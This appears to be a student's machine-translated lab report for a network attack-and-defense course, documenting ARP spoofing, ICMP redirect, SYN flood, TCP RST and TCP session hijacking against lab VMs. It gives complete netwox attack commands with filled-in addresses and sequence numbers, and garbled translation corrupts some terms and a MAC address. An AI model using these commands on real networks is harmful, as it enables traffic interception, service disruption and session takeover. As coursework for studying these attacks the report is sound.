20,199,320 2019-2020-2 "network attack and defense practice" Week 5 jobs

This work belongs courses	https://edu.cnblogs.com/campus/besti/19attackdefense
Where this requirement in the job	https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10553
My aim in this course is	Master the knowledge and network attack and defense operations
In particular aspects of the job which helped me achieve goals	Master the TCP / IP network protocol stack security issues most basic network layer and transport layer protocols that exist and targeted attack techniques

First, knowledge summary

1. TCP / IP network protocol stack attack Overview

Network security attributes

Confidentiality: to ensure that no sensitive or confidential data against unauthorized browsing in the transport and storage.

Integrity: protection is transmitted, received or stored data is intact and has not been tampered with, the tampering can be found in the fact that, when tampered tampering or position.

Availability: even in the network attack, computer virus infection, any time the system crashes, war damage, natural disasters and other emergencies under, still be able to protect data and services are normally available.

Authenticity: the ability to ensure the authenticity of an entity (such as people, processes or systems) or identity information, sources of information.

Non-repudiation: to ensure that the information system operator or handler information can not deny their behavior or deal with the results.
The basic model of network attacks
- Passive threat
  
  Interception (confidentiality) specific attack techniques: sniffing and listening
- Proactive Threat
  
  Tampering (integrity) specific attack techniques: packet tampering, identity fraud is generally carried out in conjunction with the middle attack
  
  Tampering icon:
  
  Middle attacks illustration:
  
  Interrupt (availability) specific attack techniques: Denial of Service
  
  Forgery (authenticity) specific attack techniques: Deception
TCP / IP network protocol stack security flaws and attack techniques
Original packet forgery techniques and tools
- By using a raw socket (RawSocket), bypassing the TCP / IP protocol stack packet encapsulation and verification process, construct arbitrary data packets, such as various forged packet spoofing attacks.
- Very powerful and easy to use open source toolkit: Netwox, Netwag (friendly GUI interface)

2. The network layer protocol attacks

2.1 IP source address spoofing

The root cause of IP source address spoofing can achieve that: IP protocol using the destination address of the packet routing designed only forward, not to verify the authenticity of the source address.
IP source address spoofing process:

2.2 ARP spoofing

ARP protocol to complete the IP address to MAC address mapping process :
- When a host needs to send a packet to the destination host, will first check if there MAC address of the destination host IP address corresponding to its own ARP cache. If so, then the packet is sent directly to the MAC address; if not, sends a broadcast ARP request packet, searches the MAC address of the destination host IP address corresponding to the local LAN segment.
- After the local LAN segment, all hosts receive the ARP request packet, check yourself and request an IP packet are the same. Will be consistent with the source IP and MAC address to update its ARP cache table, again the source host sends an ARP response packet; inconsistencies are ignored.
- The source host IP address of the received response packet and the MAC address to its own ARP cache table, and starts data packet transmission.
ARP spoofing attack principle : source host to send a broadcast packet to the local LAN segment to obtain the MAC destination host, and are not sent to the target host response packet authentication mechanism, ARP spoofing is resulting therefrom.
ARP spoofing process
Tools : DSniff Arpspoof suite of tools, arpoison, Ettercap, Netwox tool sets.

netwox 33 -b MAC(A) -g IP(B) -h MAC(A) -i IP(A)Spoofing A, so that A receives the IP (B) / MAC (C) mapping.

2.3 routing redirection attack

ICMP redirect mechanism routing principle : the network topology changes, the network fails, a host non-optimized route to send data, using ICMP redirect packet routing host routing table update, so that the host select a more optimum transmission route.
ICMP redirect attack routing process :
- Attack node using IP source address spoofing posing IP gateway sends ICMP redirect messages.
- Attack node is selected as a new node routing attacks.
- Open throughout the attack as a middleman node listening.
- The redirection mechanism, malicious nodes ED node is transmitted ICMP redirect packet attack, better specified path, i.e., the original correct routing.
ICMP route redirection attack techniques : netwox 86 -f "host 靶机IP" -g 攻击机IP -i 网关IPWhen sniffer means to the source or destination IP address of the packet, the gateway on behalf of an ICMP redirect IP packets to the source address (drone), so that the use as an attack aircraft IP default route.

3. Transport Layer Attack

3.1 TCP RST attack

TCP RST attack Principle: flag TCP protocol header in the "reset" bit position 1, TCP session will be disconnected.
TCP RST attack process:
- Attacker C intercepted communication parties A, IP B, port, and a serial number by sniffing.
- Using the IP source address spoofing disguised host A, sending a TCP reset packet to B, to achieve both communication interruption.
netwox attack:netwox 78 -i 靶机IP

3.2 TCP session hijacking attacks

TCP sessions principle attack: after the two sides to establish a TCP session hijacking then, avoiding the need for authentication.
TCP session hijacking process:
- Drone connections to the server
- Drone server sends a response packet (including SVR_SEQ), sends the next expected sequence number drone (including SVR_ACK).
- Attack aircraft using the ARP spoofing, impersonation drones send packets to the server.
- Drone attack aircraft sends out TCP connection to reset the drone with the server, the network administrator to avoid being discovered.

3.2 TCP SYN Flood Denial of Service Attack

Second, practice

1. ARP spoofing

Host computer	IP	MAC
Win2K (drone A, FTP server)	192.168.200.124	00: 0c: 29: c5: fb: 24
seed (drone B, FTP visitors)	192.168.200.6	00: 0c: 29: 7e: a4: 9f
kali (attack aircraft C)	192.168.200.4	00: 0c: 29: ss: 8He: four

Ping two drone attack aircraft, and then arp -aview the MAC address of the two hosts, as follows:
Use the command netwox 33 -b MAC(A) -g IP(B) -h MAC(A) -i IP(A)to the host an ARP spoofing A, such that A receives IP (B) / MAC (C ) mapping.
- Use netwox tool 5 into the node (command line work), the tool 33 (configured Ethernet ARP packets)
- input the commandnetwox 33 -b 00:0c:29:c5:fb:24 -g 192.168.200.6 -h 00:0c:29:c5:fb:24 -i 192.168.200.124
- A drone arp -ato view the ARP table, found to have been changed successfully.
Use the command netwox 33 -b MAC(B) -g IP(A) -h MAC(B) -i IP(B)to the host an ARP spoofing B, so that B receives the IP (A) / MAC (C ) mapping.
- input the commandnetwox 33 -b 00:0c:29:7e:a4:9f -g 192.168.200.124 -h 00:0c:29:7e:a4:9f -i 192.168.200.6
- B drone arp -ato view the ARP table, found to have been changed successfully.
Host B using the command ftp 192.168.200.124to access the FTP service A, attack aircraft for capture wireshark open, visible in FIG results:

Attacker captured drone communication between A, B:

2.ICMP route redirection attack

Host computer	IP
kali (attack aircraft)	192.168.200.4
winXPattacker (drone)	192.168.200.2
routing	192.168.200.1

Display route drone:
netwox 86 -f "host 靶机IP" -g 攻击机IP -i 网关IPWhen sniffer means to the source or destination IP address of the packet, it transmits the name of the gateway to the IP source address (drone) an ICMP redirect packet, so that the use as the default IP attack aircraft route.
- Attack aircraft enter netwox 86 -f "host 192.168.200.2" -g 192.168.200.4 -i 192.168.200.1into the listening state, drone access to any page, and then after the query routing information, showing that the extra two routes for the attack machine IP, as shown:

3. SYN Flood attack

Host computer IP

kali (attack aircraft) 192.168.200.4

seeubuntu (drone) 192.168.200.6
Attack of the drones way to telnet to connect, visible, successful connection:
Attacker input netwox 76 -i "192.168.200.6" -p 23to port 23 will be drone SYN Floodattacks, conduct open wireshark capture, found a large number of SYN packets:
Attacked about five minutes, telnet again, and she was connected, it may be enough seed drone of memory, you can withstand bracing for attack? Then I try to port 80 drone attack winXPattacker, I crashed, forced to quit kali, less than 60 G disk space. Well, the attacker can not easily use.

4. TCP RST attack

Host computer IP

kali (attack aircraft) 192.168.200.4

seeubuntu (drone) 192.168.200.6
Ftp connection established between the two sides:
Attack aircraft in use netwox 78 -i 192.168.200.6of drones carry out TCP RST attack. Ethereal open at wireshark

Visible attack aircraft sent to the RST drone disconnected.
Until then ftp connection, connection failure predictably:

5. TCP session hijacking attacks

Host computer	IP	MAC
winXPattacker (drone A, client)	192.168.200.2	00: 0c: 29: fa: 58: be
seed (drone B, server)	192.168.200.6	00: 0c: 29: 7e: a4: 9f
kali (attack aircraft C)	192.168.200.4	00: 0c: 29: ss: 8He: four

In order to enhance memory, I replaced the drone A, using the above ARP spoofing netwox 33 -b 00:0c:29:fa:58:be -g 192.168.200.6 -h 00:0c:29:fa:58:be -i 192.168.200.2to winXPattacker carried out ARP spoofing.
A drone Telnet to log on seed, wireshark open to attack aircraft drone A, B is the packet capture interaction. Finally found a Telnet package, click TransmissionControl Protocol to view the source port, destination port, next seq and ack the information. (Wherein the port is fixed server 23 as telnet port 23):

Because we want to send the next packet forged, so direct use next seq (725) as a next ack packet using seq ack (17) as the next packet
After obtaining the information, the attack machine tool netwox forged client send a tcp packet to the server. After sent successfully, the original client will lose connection while the server will attack aircraft as a client, so attack aircraft on the realization of session hijacking.
- Attack sends the packet format:
```
netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl (客户端ttl) --ip4-protocol 6 --ip4-src (客户端IP) --ip4-dst （服务器IP） --tcp-src （捕获到的目的端口） --tcp-dst （捕获到的源端口） --tcp-seqnum （捕获的到ACK） --tcp-acknum （捕获到的next seq） --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "要产生的结果"
```
- Attack aircraft enter the command:
```
netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.200.2 --ip4-dst 192.168.200.6 --tcp-src 1150 --tcp-dst 23 --tcp-seqnum 17 --tcp-acknum 725 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "6c"
```
  Description:
  - How to get the machine throughput?
    
    The machine input ping 127.0.0.1.
  - About ack sent packets, seq above has been introduced.
  - The "results to be produced" refers to information carried in the packet is the hexadecimal representation, "6c" I'm using the "l" hex, showing the contents of the package below caught.
- Screenshot attack aircraft enter the command:

Wireshark attack aircraft attack aircraft successfully captured forged client sends a packet to the server.

At this point, TCP session hijacking attack is successful.

Third, learn and solve problems encountered in

Question 1: kali no Internet access, in accordance with the previous approach has not solved.

Solution: The network connection mode to bridge mode, this time ifconfigfinding out eth0's IP, Baidu to enter the command line dhclient eth0, you can be found in the IP, and can be successful online.
Question 2: obviously just a Telnet connection can succeed, after its ARP spoofing, connection failed! ! !

Solution: change of another drone or the same problem. Are worried about the occasion to hand tried again, feeling I was funny, it! ! ! Quickly, and attack aircraft open wireshark capture.
Question 3: After the SYN flood attack, attack aircraft also connected to the drone, strange.

Solution: yet resolved, speculation may be sufficient memory is not afraid to attack you.

Fourth, the practice summary

First of all want to say is really so hard to network attack and defense, only high technical requirements, the brain have to be ready. Practice time, has constantly to turn principles, feeling read a book when you could understand, and practice time to forget, or do not grasp solid. This is done several attacks, principles and sense of command did not remember clearly, after which they continue to consolidate, or may acquire knowledge by practice to strengthen, a lot of practice.

Secondly sum up this practice, the use of a tool netwox ARP spoofing attacks, ICMP routing redirection attacks, SYN Flood attacks, TCP RST attack, TCP session hijacking, rationale for each attack does not elaborate here (mind retrospect .. .....), respectively, after the command used to be more familiar with, which, ARP spoofing attack ordered me a long time to understand thoroughly understand, I think it make sense to go to practice remembers better.